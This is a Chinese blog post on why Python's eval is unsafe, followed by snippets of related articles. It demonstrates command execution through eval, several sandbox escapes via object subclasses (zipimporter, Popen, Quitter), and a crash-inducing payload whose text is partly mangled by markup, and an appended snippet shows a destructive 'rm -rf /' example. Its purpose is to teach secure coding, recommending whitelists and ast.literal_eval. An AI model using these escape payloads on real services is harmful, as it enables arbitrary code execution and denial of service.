python 为什么说eval要慎用

最新推荐文章于 2025-09-25 19:18:35 发布
原创 最新推荐文章于 2025-09-25 19:18:35 发布 · 930 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python

这篇文章主要介绍了python 为什么说eval要慎用,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧。

In [1]: eval("2+3")
Out[1]: 5
 
In [2]: eval('[x for x in range(9)]')
Out[2]: [0, 1, 2, 3, 4, 5, 6, 7, 8]

当内存中的内置模块含有os的话,eval同样可以做到命令执行:

In [3]: import os
 
In [4]: eval("os.system('whoami')")
hy-201707271917\administrator
Out[4]: 0

当然,eval只能执行Python的表达式类型的代码,不能直接用它进行import操作,但exec可以。如果非要使用eval进行import,则使用__import__:

In [8]: eval("__import__('os').system('whoami')")
hy-201707271917\administrator
Out[8]: 0

在实际的代码中,往往有使用客户端数据带入eval中执行的需求。比如动态模块的引入,举个栗子,一个在线爬虫平台上爬虫可能有多个并且位于不同的模块中,服务器端但往往只需要调用用户在客户端选择的爬虫类型,并通过后端的exec或者eval进行动态调用,后端编码实现非常方便。但如果对用户的请求处理不恰当,就会造成严重的安全漏洞。

安全”使用eval

现在提倡最多的就是使用eval的后两个参数来设置函数的白名单:

Eval函数的声明为eval(expression[, globals[, locals]])

其中,第二三个参数分别指定能够在eval中使用的函数等,如果不指定,默认为globals()和locals()函数中 包含的模块和函数。

>>> import os
>>> 'os' in globals()
True
>>> eval('os.system('whoami')')
win-20140812chjadministrator
0
>>> eval('os.system('whoami')',{},{})
Traceback (most recent call last):
 File "", line 1, in
 File "", line 1, in
NameError: name 'os' is not defined

如果指定只允许调用abs函数,可以使用下面的写法:

>>> eval('abs(-20)',{'abs':abs},{'abs':abs})
20
>>> eval('os.system('whoami')',{'abs':abs},{'abs':abs})
Traceback (most recent call last):
 File "", line 1, in
 File "", line 1, in
NameError: name 'os' is not defined
>>> eval('os.system('whoami')')
win-20140812chjadministrator
0

使用这种方法来防护,确实可以起到一定的作用,但是,这种处理方法可能会被绕过,从而造成其他问题!

绕过执行代码1

被绕过的情景如下,小明知道了eval会带来一定的安全风险,所以使用如下的手段去防止eval执行任意代码:

env = {}
env["locals"] = None
env["globals"] = None
env["__name__"] = None
env["__file__"] = None
env["__builtins__"] = None
  
eval(users_str, env)

Python中的__builtins__是内置模块,用来设置内置函数的模块。比如熟悉的abs,open等内置函数,都是在该模块中以字典的方式存储的,下面两种写法是等价的:我们也可以自定义内置函数,并像使用Python中的内置函数一样使用它们:

>>> def hello():
...  print 'shabi'
>>> __builtin__.__dict__['say_hello'] = hello
>>> say_hello()
shabi

小明将eval函数的作用域中的内置模块设置为None,好像看起来很彻底了,但依然可以被绕过。__builtins__是__builtin__的一个引用,在__main__模块下,两者是等价的:

>>> id(__builtins__)
3549136
>>> id(__builtin__)
3549136

根据乌云drops提到的方法,使用如下代码即可

[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "zipimporter"][0]("/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module("configobj").os.system("uname")

上面的代码首先利用__class__和__subclasses__动态加载了object对象,这是因为eval中无法直接使用object。然后使用object的子类的zipimporter对egg压缩文件中的configobj模块进行导入,并调用其内置模块中的os模块从而实现命令执行,当然,前提是要有configobj的egg文件。 configobj模块很有意思,居然内置了os模块:

>>> "os" in configobj.__dict__
True
>>> import urllib
>>> "os" in urllib.__dict__
True
>>> import urllib2
>>> "os" in urllib2.__dict__
True
>>> configobj.os.system("whoami")
win-20140812chjadministrator
0

 和configobj类似的模块如urllib,urllib2,setuptools等都有os的内置,理论上使用哪个都行。 如果无法下载egg压缩文件,可以下载带有setup.py的文件夹,加入

from setuptools import setup, find_packages

然后执行:



python setup.py bdist_egg

就可以在dist文件夹中找到对应的egg文件。 绕过demo如下:

>>> env = {}
>>> env["locals"] = None
>>> env["globals"] = None
>>> env["__name__"] = None
>>> env["__file__"] = None
>>> env["__builtins__"] = None
>>> users_str = "[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'zipimporter'][0]('E:/internships/configobj-5.0.5-py2.7.egg').load_module('configobj').os.system('whoami')"
>>> eval(users_str, env)
win-20140812chjadministrator
0
>>> eval(users_str, {}, {})
win-20140812chjadministrator
0

拒绝服务攻击1

object的子类中有很多有趣的东西,执行以下代码查看:

[x.__name__ for x in ().__class__.__bases__[0].__subclasses__()]

这里我就不输出结果了,如果你执行的话,可以看到很多有趣的模块,比如file,zipimporter,Quitter等。经过测试,file的构造函数是被解释器沙箱隔离的。 简单的,或者直接使object暴露出的子类Quitter进行退出:



>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__
 == 'Quitter'][0](0)()", {'__builtins__':None})
 




C:/>

如果运气好,遇到对方程序中导入了os等敏感模块,那么Popen就可以用,并且绕过__builins__为空的限制,例子如下:

>>> import subprocess
>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'Popen'][0](['ping','-n','1','127.0.0.1'])",{'__builtins__':None})
  
>>>
正在 Ping 127.0.0.1 具有 32 字节的数据:<br>来自 127.0.0.1 的回复: 字节=32 时间>>

事实上,这种情况非常多,比如导入os模块,一般用来处理路径问题。所以说,遇到这种情况,完全可以列举大量的功能函数,来探测目标object的子类中是否含有一些危险的函数可以直接使用。

拒绝服务攻击2

同样,我们甚至可以绕过__builtins__为None,造成一次拒绝服务攻击,Payload(来自老外blog)如下:

>>> eval('(lambda fc=(lambda n: [c 1="c" 2="in" 3="().__class__.__bases__[0" language="for"][/c].__subclasses__() if c.__name__ == n][0]):fc("function")(fc("code")(0,0,0,0,"KABOOM",(),(),(),"","",0,""),{})())()', {"__builtins__":None})

运行上面的代码,Python直接crash掉了,造成拒绝服务攻击。 原理是通过嵌套的lambda来构造一片代码段,即code对象。为这个code对象分配空的栈,并给出相应的代码字符串,这里是KABOOM,在空栈上执行代码,会出现crash。构造完成后,调用fc函数即可触发,其思路不可谓不淫荡。

总结

从上面的内容我们可以看出,单单将内置模块置为空,是不够的,最好的机制是构造白名单,如果觉得比较麻烦,可以使用ast.literal_eval代替不安全的eval。

以上就是本文的全部内容,希望对大家的学习有所帮助。

结尾:

我是一名python开发工程师,整理了一套最新的python系统学习教程,包括从基础的python脚本到web开发、爬虫、数据分析、数据可视化、机器学习,面试宝典。想要这些资料的可以关注小编,加Q裙937963151自取Python学习资料和学习视频,还有大神在线指导哦!

pyjishu
关注
Python eval() 函数看这里就够了
127.0.0.1的博客
10-31 7万+
eval函数Python中具有非常重要的地位,熟练的使用eval函数能够为我们的Python编程提供很多的便利之处。在本文中我将详细记录eval函数Python中的使用方法及它带来便利时带来的一些其他危害,希望您阅读完本文后能够有所收获。欢迎在文章下方留言共同交流学习。
功能强大,但因安全隐患被企业禁用的Python内置函数
weixin_43790276的博客
01-02 8314
强大与危险并存。
python什么情况下要加eval,为什么必须“执行”? (而不是“ eval”)用于Python导入语句?...
weixin_30531679的博客
01-14 385
I'm trying to run a snippet of Python from within Java, using Jython. If I use an exec statement to import, everything works.PythonInterpreter pi = new PythonInterpreter();pi.exec("import re");Python...
Python里面的eval()函数
weixin_46081608的博客
09-25 1208
eval()是 Python 中的一个内置函数,它的核心功能是将字符串当作有效的 Python 表达式进行解析并执行,并返回执行结果。但要注意:它执行的必须是有效的 Python 表达式(能有返回值的代码),不能是任意代码块(如 语句、 循环等)。例如 可以执行( 是表达式语句),但 会报错( 是代码块,不是表达式)。 :必选参数,需要执行的字符串表达式(必须是有效的 Python 表达式)。 :可选参数,指定全局作用域(字典形式),限制表达式可访问的全局变量。 :可选参数,指定局部作用域
Python eval的用法及注意事项
wuyouxiaoli的博客
02-08 507
evalPython的一个内置函数,这个函数的作用是,返回传入字符串的表达式的结果。想象一下变量赋值时,将等号右边的表达式写成字符串的格式,将这个字符串作为eval的参数,eval的返回值就是这个表达式的结果。 pythoneval函数的用法十分的灵活,但也十分危险,安全性是其最大的缺点。本文从灵活性和危险性两方面介绍eval。 1、强大之处 举几个例子感受一下,字符串与list、tuple、dict的转化。 1 2 3 4 5 6 7
python中的eval函数
热门推荐
菜鸟更要努力呀
07-11 8万+
1 eval函数的简介和语法: eval()函数用来执行一个字符串表达式,并返回表达式的值。还可以把字符串转化为list、tuple、dicteval函数的语法: eval(expression[,globals[,locals]]) 参数: expression:表达式。 globals:变量作用域,如果被提供,必须是一个字典对象。 locals:变量作用域,如果被提供,可以...
python禁用内置函数,Python eval:如果我禁用内置函数属性访问,这仍然很危险吗?...
weixin_39759441的博客
12-23 230
We all know that eval is dangerous, even if you hide dangerous functions, because you can use Python's introspection features to dig down into things and re-extract them. For example, even if you dele...
python进阶之Fraction,pil,Counter,BytesIO,eval妙用......
wc199422的博客
05-10 719
Franction分数库 pil Image图片简单处理 io BytesIO eva函数用来执行一个字符串表达式,并返回表达式的值。
深度辨析 Pythoneval与 exec
lislislislislis的博客
04-06 233
Python 提供了很多内置的工具函数(Built-in Functions),在最新的 Python 3 官方文档中,它列出了 69 个。 大部分函数是我们经常使用的,例如 print()、open() 与 dir(),而有一些函数虽然不常用,但它们在某些场景下,却能发挥出不一般的作用。内置函数们能够被“提拔”出来,这就意味着它们皆有独到之处,有用武之地。 因此,掌握内置函数的用法,就成了我们应...
pythoneval函数
weixin_50853979的博客
06-02 8万+
1.eval函数的语法及用法 (1)语法:eval(expression) 参数明 expression:字符串表达式,可为算法,也可为input函数等。 明:表达式必需是字符串,否则会报错,比如直接输入数值会报错为:“TypeError: eval() arg 1 must be a string, bytes or code object”,如下图所示。 (2)作用:接收运行一个字符串表达式,返回表达式的结果值。 2.实例 (1)简单的计算用法 例1:求得2+3得值。 e
python eval()
qq_18668137的博客
01-06 1639
eval(expression, globals=None, locals=None),将字符串str当成有效的表达式来求值并返回计算结果。 example: a = 1 g = {'a':20} eval("a+1",g) result 21   x = 1 y = 1 num1 = eval("x+y") print(num1) def g(): x = 2 ...
pythoneval_eval()函数
weixin_39669769的博客
11-24 399
python内置函数eval(),用来将一个字符串当作python表达式执行,并返回执行结果。比如:>>> a = '[1,2,3,4,5,6]'>>> a'[1,2,3,4,5,6]'>>> alist = eval(a)>>> alist[1, 2, 3, 4, 5, 6]这段代码将一个字符串a,通过eval函数执行,就变成了一个list对象。eval()函数很灵活,我们写的python代码,...
python---eval函数
qq_58662768的博客
07-27 632
1、eval()功能强大但潜在危险2、永远不要用eval()执行不可信的输入3、在必须使用时,限制其执行环境4、考虑使用更安全的替代方案如ast.literal_eval()
Pythoneval() 函数:动态执行字符串表达式
GitHub_miao的博客
02-22 2901
eval()函数Python 中的一个内置函数,用于动态执行字符串表达式。expression是一个字符串,包含要执行的 Python 表达式。globals是一个可选参数,表示全局命名空间(字典类型)。locals是一个可选参数,表示局部命名空间(字典类型)。eval()函数Python 中一个非常强大且灵活的函数,可以用于动态执行字符串表达式。通过合理地应用eval()函数,可以实现许多有趣和实用的功能,但在使用时需要注意安全性和性能问题。希望本文提供的示例能够帮助大家更好地理解和应用。
python中的 eval 用法
王子老师
12-07 278
python中的eval用法 将字符串中的单引号,双引号去掉 返回 变量-列表-元祖
python eval简介
weixin_38383877的博客
05-10 511
d={"id":1,"name":2} print(d) print(dict({'id':1,'name':2})) # print(dict("{'id':1,'name':2}")) 错误,无法输出 print(dict(eval("{'id':1,'name':2}"))) #eval将字符串转换为字典 输出结果: {‘id’: 1, ‘name’: 2} {‘id’: 1, ‘name’: 2} {‘id’: 1, ‘name’: 2} ...
eval的使用
最新发布
11-24
`eval()` 是 Python 中一个非常强大但**危险**的内置函数,它可以将字符串当作 Python 表达式来执行。正确使用能提升灵活性,滥用则可能导致安全漏洞。 --- ## ✅ 一、`eval()` 的基本语法 ```python eval(expression, globals=None, locals=None) ``` - `expression`: 必须是一个字符串形式的 **合法 Python 表达式** - `globals`: 可选,全局命名空间(字典) - `locals`: 可选,局部命名空间(映射对象) > ⚠️ 注意:`eval()` 只能执行表达式(有返回值),不能执行语句(如赋值、import、def 等)。 --- ## ✅ 二、`eval()` 的常见用途与示例 ### ✅ 1. 计算数学表达式(字符串转计算) ```python expr = "2 + 3 * 4" result = eval(expr) print(result) # 输出: 14 ``` #### 应用场景: - 动态计算器 - 配置文件中写公式 ```python # 用户输入或配置项 formula = "x**2 + 2*x + 1" x = 5 result = eval(formula) print(result) # 36 ``` --- ### ✅ 2. 将字符串表示的数据结构转换为真实对象 ```python s = "[1, 2, 'hello', {'a': 3}]" lst = eval(s) print(type(lst)) # <class 'list'> print(lst) # [1, 2, 'hello', {'a': 3}] ``` > 类似于 `json.loads()`,但支持更复杂的 Python 字面量(包括元组、集合、嵌套 dict 等) ⚠️ 对比: | 方法 | 支持类型 | 安全性 | |------|----------|--------| | `eval()` | 所有 Python 字面量 + 表达式 | ❌ 极低 | | `ast.literal_eval()` | list, dict, tuple, str, int, bool, None | ✅ 高 | ✅ 推荐替代方案(安全): ```python import ast safe_string = "[1, 2, {'key': 'value'}]" data = ast.literal_eval(safe_string) print(data) ``` > ✅ `ast.literal_eval()` 只允许“字面量”,不会执行任意代码! --- ### ✅ 3. 动态调用函数或访问变量 ```python def add(a, b): return a + b def multiply(a, b): return a * b func_name = "add" a, b = 10, 20 result = eval(f"{func_name}({a}, {b})") print(result) # 30 ``` > 更好的做法是使用字典映射: ```python functions = { "add": add, "multiply": multiply } result = functions[func_name](a, b) ``` 避免 `eval`,提高可读性和安全性。 --- ### ✅ 4. 在模板引擎或规则引擎中的动态判断(慎用) ```python # 模拟风控规则判断 user = {"age": 25, "score": 80, "city": "Beijing"} rule = "user['age'] > 18 and user['score'] >= 60" if eval(rule): print("通过审核") else: print("拒绝") ``` > ✅ 可行但不推荐!应使用 DSL 或规则引擎(如 `simpleeval`) --- ## ⚠️ 三、`eval()` 的安全隐患(非常重要!) ### ❌ 危险示例:任意代码执行 ```python # 假设用户输入了这个 malicious_input = "__import__('os').system('rm -rf /')" # 删除所有文件(模拟) eval(malicious_input) # 💥 系统命令被执行! ``` 即使不是这么极端的例子: ```python eval("open('/tmp/hacked.txt', 'w').write('pwned')") # 写入恶意文件 ``` 只要 `eval()` 执行了不受信任的输入,就等于把钥匙交给了攻击者。 --- ## ✅ 四、如何安全使用 `eval()`? ### ✅ 方案 1:完全禁用,使用 `ast.literal_eval()` 替代 适用于:解析字符串为数据结构 ```python import ast text = "{'name': 'Alice', 'age': 30}" try: data = ast.literal_eval(text) print(data) except (SyntaxError, ValueError) as e: print("无效输入:", e) ``` > ✅ 支持:str, int, float, list, tuple, dict, bool, None > ❌ 不支持:函数调用、变量引用、表达式运算 --- ### ✅ 方案 2:限制 `globals` 和 `locals` ```python # 清空内置函数和模块 safe_globals = { "__builtins__": {}, # 屏蔽所有内置函数 } # 提供你需要的安全函数 math_ops = { "abs": abs, "round": round, "max": max, "min": min } expr = "abs(-10) + round(3.7)" result = eval(expr, {**safe_globals, **math_ops}) print(result) # 14 ``` 此时 `__import__('os')` 就无法执行了。 --- ### ✅ 方案 3:使用第三方库 `simpleeval` 安装: ```bash pip install simpleeval ``` 使用: ```python from simpleeval import simple_eval # 安全地计算表达式 result = simple_eval("x * 2 + y", names={"x": 10, "y": 5}) print(result) # 25 # 添加自定义函数 def greet(name): return f"Hello {name}" result = simple_eval( "greet('World')", functions={"greet": greet}, names={} ) print(result) # Hello World ``` > ✅ 特点: - 默认禁止访问 `__builtins__` - 可控的变量和函数注入 - 支持简单逻辑判断 适合做规则引擎、动态表达式求值等。 --- ## ✅ 五、最佳实践总结 | 使用场景 | 推荐方式 | |---------|----------| | 解析字符串为列表/字典 | ✅ `ast.literal_eval()` | | 数学表达式计算 | ✅ `simpleeval` 或受限 `eval` | | 动态函数调用 | ✅ 字典映射 `funcs[name](*args)` | | 规则判断引擎 | ✅ `simpleeval`, `pyparsing`, 或专用 DSL | | 任意用户输入求值 | ❌ 绝对禁止 `eval()` | --- ## ✅ 六、完整对比表 | 特性 | `eval()` | `ast.literal_eval()` | `simpleeval` | |------|----------|------------------------|---------------| | 执行表达式 | ✅ | ✅(仅字面量) | ✅ | | 执行函数调用 | ✅ | ❌ | ✅(可配置) | | 安全性 | ❌ 极低 | ✅ 高 | ✅ 中高 | | 是否需安装 | ✅ 内置 | ✅ 内置 | ❌ 需 `pip install` | | 适用场景 | 调试/内部脚本 | 数据反序列化 | 规则引擎/公式计算 | ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值